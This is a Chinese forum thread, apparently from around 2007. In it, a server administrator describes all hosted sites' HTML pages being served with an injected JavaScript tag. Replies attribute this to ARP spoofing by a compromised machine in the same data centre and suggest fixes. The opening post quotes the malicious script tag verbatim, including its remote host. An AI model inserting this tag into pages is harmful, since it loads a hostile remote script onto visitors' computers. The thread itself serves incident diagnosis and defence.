服务器内全部网站的页面被挂js代码,原因找到了
昨天晚上12点开始,我朋友托管的一台服务器内的多个站点,访问HTML页面时,页头原码全部被加上一段js病毒代码,代码如下:(<script src=http://1.520sb.cn/1.js></script> )请注意,浏览该代码前请确保自己的电脑不被感染病毒,由此造成的损失与我无关,该代码至我发帖止还可以访问。
检查网页和整个服务器,没有发现该代码,过了两个多小时,代码突然消失。消失前服务器没有做任何改动。
今天上午搜索了相关信息,发现一个论坛有如下网友发帖(附下),有同感,打电话去机房问,果然当时同机房有其他服务器中毒,他们已经处理好了。
感谢那个网友的帖子,所以,在此发帖,供以后有其他人遇此情况作参考。
附帖:
[url]http://linux.chinaunix.net/bbs/thread-886420-4-1.html[/url]
34楼 发表于 2007-2-12 18:08
和你们说的都无关 这是arpsniffer的一种,数据包在送出到达网关的过程中被劫持 主要原因是内网有计算机被控制,通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性,所以劫持的成功率不一样。
呵呵。客户有次遇到过,最后原因就是这个,重装系统都没用,找出那个计算机是关键
[[i] 本帖最后由 qw3691 于 2007-3-20 13:20 编辑 [/i]] 自己站的服务器安全做好了。呵呵。。现在不进程序安全了。
包括服务器安全也要好了。可以欺骗DNS来挂马的。。!!整个网段都受到威胁!! 还是专业点好啊大哥。。。 应该不是arp。。。。。。arp 你机器会断网的 把网页压缩输出 我也遇到了,当时吓了一跳,以为程序出漏洞了 :mad: :mad: :( 搜索我的贴`不用机房也可以解决`自己装防火墙在服务器上就是了 `出这个问题是你自己安全没配置好` 这个问题也很好解决的,通常把病毒要替换的关键字,修改后 就可以防范,3分钟内解决所有网站这个问题可联系本人
页:
[1]